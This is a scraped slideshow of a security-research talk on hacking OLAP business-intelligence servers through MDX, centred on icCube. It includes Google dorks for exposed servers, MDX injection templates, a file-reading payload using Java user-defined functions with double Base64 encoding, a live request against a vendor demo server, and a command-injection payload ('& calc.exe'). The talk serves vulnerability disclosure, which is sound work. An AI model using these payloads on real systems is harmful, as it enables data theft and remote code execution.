Successfully reported this slideshow.
Invest in security
to secure investments

BI hacking – Breaking ICCube
Dmitry Chastukhin – Director of SAP pentest/researc...
Dmitry chipik Chastuhin

Yet another security
researcher
Business application
security expert
Ненавижу слова
«кулуары» и «...
OLAP & Big Data

erpscan.com

ERPScan — invest in security to secure investments

3
WTH is OLAP?

• Online analytical processing (OLAP) is an approach to
formulate and answer multidimensional queries to
lar...
Usage areas

Big Data

Retail
Government
Energy
Healthcare
Advertising
erpscan.com

ERPScan — invest in security to secure...
Main players of OLAP industry

erpscan.com

ERPScan — invest in security to secure investments

6
Google dork

Many of these servers can be accessed directly
from the Web, here are some dorks:
Service

Dork

Pentaho Busi...
A Quick Glance…

And here they are:

erpscan.com

ERPScan — invest in security to secure investments

8
A quick glance…

erpscan.com

ERPScan — invest in security to secure investments

9
Basic entities
Simple table

Country

Date
Country
City
Customer
Supplier
Product

?

Totals
Cities

Supplier

Totals
Rout...
So what?

• We’re in N dimensions!

erpscan.com

ERPScan — invest in security to secure investments

11
Cube will help!
MDX

erpscan.com

ERPScan — invest in security to secure investments

13
WTH is MDX?

• SQL isn’t convenient to access Big Data.
• MDX (MultiDimension eXpressions) comes to
replace it.
• MDX look...
MDX query form
[ WITH <SELECT WITH clause>
[ , <SELECT WITH clause>...n ] ]
SELECT
[ * | (
<SELECT query axis clause>
[ , ...
MDX SELECT query sample
WITH
MEMBER SelectedMeasure AS ([Measures].[Salary
Paid])
SELECT
{ [SelectedMeasure] }
ON COLUMNS,...
MDX Processing

Data (SQL?)

MDX
mdXML
OLAP

OLTP

Application
erpscan.com

Data
ERPScan — invest in security to secure in...
Attacks on MDX

mdXML attacks (good old XXE and
much more)

MDX injections
User-defined functions attacks
erpscan.com

ERP...
MDX Injections

erpscan.com

ERPScan — invest in security to secure investments

19
What will help to inject?

• Commentaries:
– single line -- - (as in SQL)
– multiline /* … */

• Special functions for dim...
Where to inject?
WITH
MEMBER SelectedMeasure AS ([Measures].[Salary Paid])
SELECT
here
{
[SelectedMeasure]
}
ON COLUMNS,
{...
Types of injections

Pre-SELECT
(WITH):

• You can do everything

In-SELECT:

• Partial cube info gathering and crosscube ...
Pre-SELECT injection
WITH
MEMBER SelectedMeasure AS ([Measures].[Salary Paid]
MEMBER [Rank] AS (
Rank([Employee].[Employee...
In-SELECT injection
WITH
MEMBER SelectedMeasure AS ([Measures].[Salary Paid])
SELECT
{
[SelectedMeasure]
}
ON COLUMNS,
{
(...
MDX Tips & Tricks (1)

Use {null} on axis to get all or nothing
You can use Dimensions to access cube dimensions
LOOKUPCUB...
Modifying data with MDX

Normally, you can’t modify data with MDX:
• MDX was created for data extraction, not
modification...
MDX Update Query

Simple update query:
UPDATE CUBE [Sales] SET
([Geography].[Geo].[Europe],
[Measures].[Amount]) = 20

So,...
MDX UDF

erpscan.com

ERPScan — invest in security to secure investments

28
User-Defined Function

User-Defined Function (UDF) – these are functions
written by the user or a third-party developer
wh...
Attack on UDF. IcCube OLAP Server

IcCube OLAP Server
• Popular OLAP Server
• Free. Has a Community edition
• Cross-platfo...
IcCube OLAP Server

erpscan.com

ERPScan — invest in security to secure investments

31
IcCube OLAP Server

erpscan.com

ERPScan — invest in security to secure investments

32
IcCube OLAP Server

• Of course IcCube used MDX, but where?
•Send some request in WebReport, and look in
Burp

erpscan.com...
IcCube OLAP Server
POST /icCube/gvi
action=executeMdx&mdx=SELECT { {[Measures].[Cashflow (M)],[Measures].[Cumulative Cashf...
IcCube OLAP Server

• Try to use user defined functions
• As we remember – icCube is a Java application
• Let's try JAVA f...
IcCube OLAP Server

erpscan.com

ERPScan — invest in security to secure investments

36
IcCube OLAP Server

• Probably, we can call public static JAVA
functions. Cool.
J!System.getProperty("user.dir")

erpscan....
IcCube OLAP Server
• IcCube developers restrict access from user defined functions to
dangerous JAVA functions
• From MDX,...
IcCube OLAP Server
• icCube-install/lib directory contains
a lot of interesting .jar files with interesting
functions, whi...
UDF. IcCube OLAP Server

• Let’s try to read file c:111.txt from server, which
contains text: “hello_MDX”
• For input, we ...
UDF. IcCube OLAP Server

erpscan.com

ERPScan — invest in security to secure investments

41
UDF. IcCube OLAP Server

• But if the file contains special charsets or even
whitespaces, MDX parser won’t return their
co...
UDF. IcCube OLAP Server

• Ok. Just encode the file content. Base64, for
example
• We found a method :
org.apache.commons....
UDF. IcCube OLAP Server

• Hmm, probably the Base64 string contained an
‘EQ’ sequence, which means “equivalent”
• Ok, enco...
UDF. IcCube OLAP Server

• oh, the “=” symbol is often found in the Base64
string
• to resolve this problem, just concaten...
UDF. IcCube OLAP Server

• Final user-defined function call:

StrToTuple(J!org.apache.commons.codec.binary.Base64.encodeBa...
UDF. IcCube OLAP Server

Decode WVVkV2MySkhPV1pVVlZKWlNVZEtjMWxYU25OWlVUMDk=

erpscan.com

ERPScan — invest in security to...
UDF. IcCube OLAP Server

• We must not forget to add
“=” at the end of the Base64
string because the MDX
parser has trimme...
UDF. IcCube OLAP Server
This vulnerability is very interesting, especially because users
passwords in IcCube OLAP Server a...
UDF. IcCube OLAP Server

• Example: getting user home directory from icCube demo
server demo3.iccube.com
POST /icCube/gvi ...
UDF. IcCube OLAP Server
HTTP/1.1 200 OK
{version:'0.6',status:'error',errors:[{reason:'other',message:'u0027u0027L2h
vbWUv...
UDF. IcCube OLAP Server

DEMO

erpscan.com

ERPScan — invest in security to secure investments

52
UDF. IcCube OLAP Server
• But, dangerous JAVA methods are only half of the problem
• Dangerous JAVA methods with bugs are ...
UDF. IcCube OLAP Server

• variable “path” used as parameter in command
“cmd.exe /C dir/-c path”
• variable “path” isn’t c...
UDF. IcCube OLAP Server

DEMO

erpscan.com

ERPScan — invest in security to secure investments

55
Conclusion

• MDX is a very popular language
• At this moment, we don’t have an alternative
language for multidimensional ...
Web:
www.erpscan.com
e-mail: info@erpscan.com
Twitter:
@erpscan
@_chipik
@dark_k3y
Upcoming SlideShare
Loading in …5
×

Dmitry Chastukhin - Business Intelligence hacking – Breaking ICCube

693 views

Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Dmitry Chastukhin - Business Intelligence hacking – Breaking ICCube

  1. 1. Invest in security to secure investments BI hacking – Breaking ICCube Dmitry Chastukhin – Director of SAP pentest/research team
  2. 2. Dmitry chipik Chastuhin Yet another security researcher Business application security expert Ненавижу слова «кулуары» и «коллеги»
  3. 3. OLAP & Big Data erpscan.com ERPScan — invest in security to secure investments 3
  4. 4. WTH is OLAP? • Online analytical processing (OLAP) is an approach to formulate and answer multidimensional queries to large datasets. • OLAP technologies developed by many software giants since the 199x. • Business intelligence (BI) is a methodology that helps managers in the analysis of information inside and outside the company. • OLAP is all about BI and Big Data. erpscan.com ERPScan — invest in security to secure investments 4
  5. 5. Usage areas Big Data Retail Government Energy Healthcare Advertising erpscan.com ERPScan — invest in security to secure investments 5
  6. 6. Main players of OLAP industry erpscan.com ERPScan — invest in security to secure investments 6
  7. 7. Google dork Many of these servers can be accessed directly from the Web, here are some dorks: Service Dork Pentaho Business Analytics XMLA interface inurl:/mondrian/testpage.jsp inurl:/pentaho/testpage.jsp Pentaho Business Analytics intitle:"Pentaho User Console Login" ISAPI MS Analysis Services inurl:msmdpump.dll SAP NetWeawer inurl:/sap/bc/bsp Oracle EssBase intitle:"Hyperion System 9" inurl:asp erpscan.com ERPScan — invest in security to secure investments 7
  8. 8. A Quick Glance… And here they are: erpscan.com ERPScan — invest in security to secure investments 8
  9. 9. A quick glance… erpscan.com ERPScan — invest in security to secure investments 9
  10. 10. Basic entities Simple table Country Date Country City Customer Supplier Product ? Totals Cities Supplier Totals Route What if we need to get totals by countries and suppliers vs. cities? Can we really do it in 2D? erpscan.com ERPScan — invest in security to secure investments 10
  11. 11. So what? • We’re in N dimensions! erpscan.com ERPScan — invest in security to secure investments 11
  12. 12. Cube will help!
  13. 13. MDX erpscan.com ERPScan — invest in security to secure investments 13
  14. 14. WTH is MDX? • SQL isn’t convenient to access Big Data. • MDX (MultiDimension eXpressions) comes to replace it. • MDX looks like SQL, but it’s not SQL: – (usually) you can’t modify data – MDX is much stricter than SQL erpscan.com ERPScan — invest in security to secure investments 14
  15. 15. MDX query form [ WITH <SELECT WITH clause> [ , <SELECT WITH clause>...n ] ] SELECT [ * | ( <SELECT query axis clause> [ , <SELECT query axis clause>,...n ] ) ] FROM <SELECT subcube clause> [ <SELECT slicer axis clause> ] [ <SELECT cell property list clause> ] erpscan.com ERPScan — invest in security to secure investments 15
  16. 16. MDX SELECT query sample WITH MEMBER SelectedMeasure AS ([Measures].[Salary Paid]) SELECT { [SelectedMeasure] } ON COLUMNS, { ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].[M]) } ON ROWS FROM [HR] WHERE ([Store].[Store].AllMembers) erpscan.com ERPScan — invest in security to secure investments 16
  17. 17. MDX Processing Data (SQL?) MDX mdXML OLAP OLTP Application erpscan.com Data ERPScan — invest in security to secure investments 17
  18. 18. Attacks on MDX mdXML attacks (good old XXE and much more) MDX injections User-defined functions attacks erpscan.com ERPScan — invest in security to secure investments 18
  19. 19. MDX Injections erpscan.com ERPScan — invest in security to secure investments 19
  20. 20. What will help to inject? • Commentaries: – single line -- - (as in SQL) – multiline /* … */ • Special functions for dimensions and members crawling: Parent, FirstChild, LastChild, DefaultMember e.t.c. • Subqueries in FROM ( … ) erpscan.com ERPScan — invest in security to secure investments 20
  21. 21. Where to inject? WITH MEMBER SelectedMeasure AS ([Measures].[Salary Paid]) SELECT here { [SelectedMeasure] } ON COLUMNS, { ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].[M]) here } ON ROWS FROM [HR] here WHERE ([Store].[Store].AllMembers) erpscan.com ERPScan — invest in security to secure investments 21
  22. 22. Types of injections Pre-SELECT (WITH): • You can do everything In-SELECT: • Partial cube info gathering and crosscube queries • Partial access to cube data In-WHERE • Blind MDX erpscan.com ERPScan — invest in security to secure investments 22
  23. 23. Pre-SELECT injection WITH MEMBER SelectedMeasure AS ([Measures].[Salary Paid] MEMBER [Rank] AS ( Rank([Employee].[Employee].currentmember, Head([Employee].[Employee].members, Dimensions.count-1)) ) MEMBER HierName AS ( Dimensions([Rank]).uniquename ) SELECT {[Rank], [HierName]} on 0, {Head([Employee].[Employee].members, Dimensions.count-1)} on 1 FROM [HR] /* [Salary Paid]) SELECT { [SelectedMeasure] ...rest of query... erpscan.com ERPScan — invest in security to secure investments 23
  24. 24. In-SELECT injection WITH MEMBER SelectedMeasure AS ([Measures].[Salary Paid]) SELECT { [SelectedMeasure] } ON COLUMNS, { ([Employee].[Department].[Department].[HQ Marketing], [Gender].[Gender].AllMembers, [User name].[User name].AllMembers) } ON ROWS FROM [HR] WHERE ([Store].[Store].AllMembers) /* [M]) } ... rest of request ... erpscan.com ERPScan — invest in security to secure investments 24
  25. 25. MDX Tips & Tricks (1) Use {null} on axis to get all or nothing You can use Dimensions to access cube dimensions LOOKUPCUBE provides access to another cube You can use /* multiline commentary without closing ‘*/’ Use DESCENDANTS to get all data about a member You can convert to/from strings to pass data within query erpscan.com ERPScan — invest in security to secure investments 25
  26. 26. Modifying data with MDX Normally, you can’t modify data with MDX: • MDX was created for data extraction, not modification. • ALTER, CREATE and DROP are used for operations with measures and temporary sets, not for changing cube data. But in rare cases, you can modify data with UPDATE statement. erpscan.com ERPScan — invest in security to secure investments 26
  27. 27. MDX Update Query Simple update query: UPDATE CUBE [Sales] SET ([Geography].[Geo].[Europe], [Measures].[Amount]) = 20 So, if you can control all query AND data modification in cube is enabled, you can modify data in any cube, that you have permissions to access. erpscan.com ERPScan — invest in security to secure investments 27
  28. 28. MDX UDF erpscan.com ERPScan — invest in security to secure investments 28
  29. 29. User-Defined Function User-Defined Function (UDF) – these are functions written by the user or a third-party developer which can take and return values ​in the MDX syntax. «ProgramID»!«FunctionName»(«Argument1», «Argument2», ...) erpscan.com ERPScan — invest in security to secure investments 29
  30. 30. Attack on UDF. IcCube OLAP Server IcCube OLAP Server • Popular OLAP Server • Free. Has a Community edition • Cross-platform Java app: Windows, Linux, • Fast • Has many utilities: IDE,web reports • etc… erpscan.com ERPScan — invest in security to secure investments 30
  31. 31. IcCube OLAP Server erpscan.com ERPScan — invest in security to secure investments 31
  32. 32. IcCube OLAP Server erpscan.com ERPScan — invest in security to secure investments 32
  33. 33. IcCube OLAP Server • Of course IcCube used MDX, but where? •Send some request in WebReport, and look in Burp erpscan.com ERPScan — invest in security to secure investments 33
  34. 34. IcCube OLAP Server POST /icCube/gvi action=executeMdx&mdx=SELECT { {[Measures].[Cashflow (M)],[Measures].[Cumulative Cashflow (M)]} } ON COLUMNS,{ [Calendar].[Calendar].[Quarter].allmembers } ON ROWS FROM ( SELECT { {[Product Type].[Product Type].[Product Type-L].&[Fixed Income I], [Product Type].[Product Type].[Product TypeL].&[Fixed Income II], [Product Type].[Product Type].[Product Type-L].&[Saving Account], [Product Type].[Product Type].[Product Type-L].&[Fixed Income Derivative I], [Product Type].[Product Type].[Product Type-L].&[Fixed Income Derivative II], [Product Type].[Product Type].[Product Type-L].&[Other]} } ON 0,{ {[Currency].[Currency].[Currency-L].&[121], [Currency].[Currency].[Currency-L].&[114], [Currency].[Currency].[Currency-L].&[119], [Currency].[Currency].[Currency-L].&[115], [Currency].[Currency].[Currency-L].&[133], [Currency].[Currency].[Currency-L].&[130], [Currency].[Currency].[Currency-L].&[122], [Currency].[Currency].[Currency-L].&[128], [Currency].[Currency].[Currency-L].&[124], [Currency].[Currency].[Currency-L].&[125], [Currency].[Currency].[Currency-L].&[123], [Currency].[Currency].[Currency-L].&[118], [Currency].[Currency].[Currency-L].&[126], [Currency].[Currency].[Currency-L].&[131], [Currency].[Currency].[Currency-L].&[116], [Currency].[Currency].[Currency-L].&[117], [Currency].[Currency].[Currency-L].&[132], [Currency].[Currency].[Currency-L].&[127], [Currency].[Currency].[Currency-L].&[120]} } ON 1,{ {[Interest/Principal].[Interest/Principal].[Interest/PrincipalL].&[1], [Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[2], [Interest/Principal].[Interest/Principal].[Interest/Principal-L].&[3]} } ON 2,{ {[Profit Unit].[Profit Unit].[Profit Unit-L1].&[-], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Corporate], [Profit Unit].[Profit Unit].[Profit UnitL1].&[Debt], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Funding], [Profit Unit].[Profit Unit].[Profit UnitL1].&[Investments], [Profit Unit].[Profit Unit].[Profit Unit-L1].&[Special Purpose]} } ON 3 FROM [Cube])&schema=Bank I&tqx=out:json erpscan.com ERPScan — invest in security to secure investments 34
  35. 35. IcCube OLAP Server • Try to use user defined functions • As we remember – icCube is a Java application • Let's try JAVA functions J!Math.PI erpscan.com ERPScan — invest in security to secure investments 35
  36. 36. IcCube OLAP Server erpscan.com ERPScan — invest in security to secure investments 36
  37. 37. IcCube OLAP Server • Probably, we can call public static JAVA functions. Cool. J!System.getProperty("user.dir") erpscan.com ERPScan — invest in security to secure investments 37
  38. 38. IcCube OLAP Server • IcCube developers restrict access from user defined functions to dangerous JAVA functions • From MDX, we can use some JAVA classes like Math … • … and “if you need JAVA classes from JAR that are not available with icCube, simply add them to the icCube-install/lib directory” (c) www.iccube.com erpscan.com ERPScan — invest in security to secure investments 38
  39. 39. IcCube OLAP Server • icCube-install/lib directory contains a lot of interesting .jar files with interesting functions, which we can call For example: org.apache.commons.io. FileUtils.readFileToString(FILE file) from commons-io-1.4.jar erpscan.com ERPScan — invest in security to secure investments 39
  40. 40. UDF. IcCube OLAP Server • Let’s try to read file c:111.txt from server, which contains text: “hello_MDX” • For input, we can use error messages: J!org.apache.commons.io.FileUtils.readFileToString(J!File("c:/111.txt") •Final MDX request SELECT{StrToTuple(J!org.apache.commons.io.FileUtils. readFileToString(J!File("c:/111.txt")))} ON COLUMNS FROM [Sales] erpscan.com ERPScan — invest in security to secure investments 40
  41. 41. UDF. IcCube OLAP Server erpscan.com ERPScan — invest in security to secure investments 41
  42. 42. UDF. IcCube OLAP Server • But if the file contains special charsets or even whitespaces, MDX parser won’t return their content • For example, if we try to read the file “hello_MDX blabla”, we will get this error: “syntax error: unexpected statement 'blabla' (REGULAR_IDENTIFIER)” erpscan.com ERPScan — invest in security to secure investments 42
  43. 43. UDF. IcCube OLAP Server • Ok. Just encode the file content. Base64, for example • We found a method : org.apache.commons.codec.binary.Base64.encodeBase64(byte[] binaryData) in the file commons-codec-1.6.jar • tried it… and got the error: syntax error: unexpected statement 'EQ' erpscan.com ERPScan — invest in security to secure investments 43
  44. 44. UDF. IcCube OLAP Server • Hmm, probably the Base64 string contained an ‘EQ’ sequence, which means “equivalent” • Ok, encoded the file content twice… • …and got the error: syntax error: missing expression following '=' erpscan.com ERPScan — invest in security to secure investments 44
  45. 45. UDF. IcCube OLAP Server • oh, the “=” symbol is often found in the Base64 string • to resolve this problem, just concatenate the Base64 string which contains “=” with one letter MTIzNDU=s When MDX parser works, it drops “=” and all symbols after that. But “=” is always at the end of Base64, we can still decode it. erpscan.com ERPScan — invest in security to secure investments 45
  46. 46. UDF. IcCube OLAP Server • Final user-defined function call: StrToTuple(J!org.apache.commons.codec.binary.Base64.encodeBas e64(J!org.apache.commons.codec.binary.Base64.encodeBase64(J! org.apache.commons.io.FileUtils.readFileToByteArray(J!File("c:/11 1.txt"))))+"s") erpscan.com ERPScan — invest in security to secure investments 46
  47. 47. UDF. IcCube OLAP Server Decode WVVkV2MySkhPV1pVVlZKWlNVZEtjMWxYU25OWlVUMDk= erpscan.com ERPScan — invest in security to secure investments 47
  48. 48. UDF. IcCube OLAP Server • We must not forget to add “=” at the end of the Base64 string because the MDX parser has trimmed them • After decoding, we got the text from the file c:111.txt erpscan.com ERPScan — invest in security to secure investments 48
  49. 49. UDF. IcCube OLAP Server This vulnerability is very interesting, especially because users passwords in IcCube OLAP Server are stored as Base64 encoded strings in the file icCubeUsers.icc-users <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <users> <user name="admin" password="☁YWRtaW4="> <role>administrator</role> </user> <user password="☁ZGVtbw==" name="demo"> <role>standard</role> </user> <user name="marc" password="☁bWFyYw=="> <role>standard</role> <role>administrator</role> </user> </users> erpscan.com ERPScan — invest in security to secure investments 49
  50. 50. UDF. IcCube OLAP Server • Example: getting user home directory from icCube demo server demo3.iccube.com POST /icCube/gvi HTTP/1.1 Host: demo3.iccube.com action=executeMdx&mdx=SELECT{StrToTuple(J!crazydev.commo n.security.Base64Encoder.encodeString(J!crazydev.common.utils .CdSystemUtils.getStringProperty("user.home","aaa"))%2b"ss")} +ON+COLUMNS,{[Calendar].[Calendar].allmembers+}+ON+ROW S+FROM+[Cube]&schema=Bank+I&tqx=out%3Ajson erpscan.com ERPScan — invest in security to secure investments 50
  51. 51. UDF. IcCube OLAP Server HTTP/1.1 200 OK {version:'0.6',status:'error',errors:[{reason:'other',message:'u0027u0027L2h vbWUvZGVtbzMu0027 is neither a dimension nor a hierarchy within the cube.u0027 is neither a dimension nor a hierarchy within the cube.',detailed_message:'SELECT{StrToTuple(J!crazydev.common.security.Bas e64Encoder.encodeString(J!crazydev.common.utils.CdSystemUtils.getStringPr operty(u0022user.homeu0022,u0022aaau0022))+u0022ssu0022)} ON COLUMNS,rn{[Calendar].[Calendar].allmembers } ON ROWSrn FROM [Cube]rn',error_code:'OLAP_UNKNOWN_DIMENSION_HIERARCHY'}]} After decoding “L2hvbWUvZGVtbzM=”, we get “/home/demo3” erpscan.com ERPScan — invest in security to secure investments 51
  52. 52. UDF. IcCube OLAP Server DEMO erpscan.com ERPScan — invest in security to secure investments 52
  53. 53. UDF. IcCube OLAP Server • But, dangerous JAVA methods are only half of the problem • Dangerous JAVA methods with bugs are another thing which the attacker can use • Method org.apache.commons.io.FileSystemUtils.freeSpaceWindows(String path) from commons-io-1.4.jar erpscan.com ERPScan — invest in security to secure investments 53
  54. 54. UDF. IcCube OLAP Server • variable “path” used as parameter in command “cmd.exe /C dir/-c path” • variable “path” isn’t checked, that’s why an attacker can inject operation system commands That’s the code of the user-defined function which executes calc.exe on the server OS J!FileSystemUtils.freeSpace("& calc.exe") erpscan.com ERPScan — invest in security to secure investments 54
  55. 55. UDF. IcCube OLAP Server DEMO erpscan.com ERPScan — invest in security to secure investments 55
  56. 56. Conclusion • MDX is a very popular language • At this moment, we don’t have an alternative language for multidimensional data requests • All developers forget about MDX security. Back to 2000 • Security issues in MDX may cause a lot of attacks: data stealing, file reading, privilege escalation, remote code execution, SQL injection, cross site scripting, etc. erpscan.com ERPScan — invest in security to secure investments 56
  57. 57. Web: www.erpscan.com e-mail: info@erpscan.com Twitter: @erpscan @_chipik @dark_k3y

×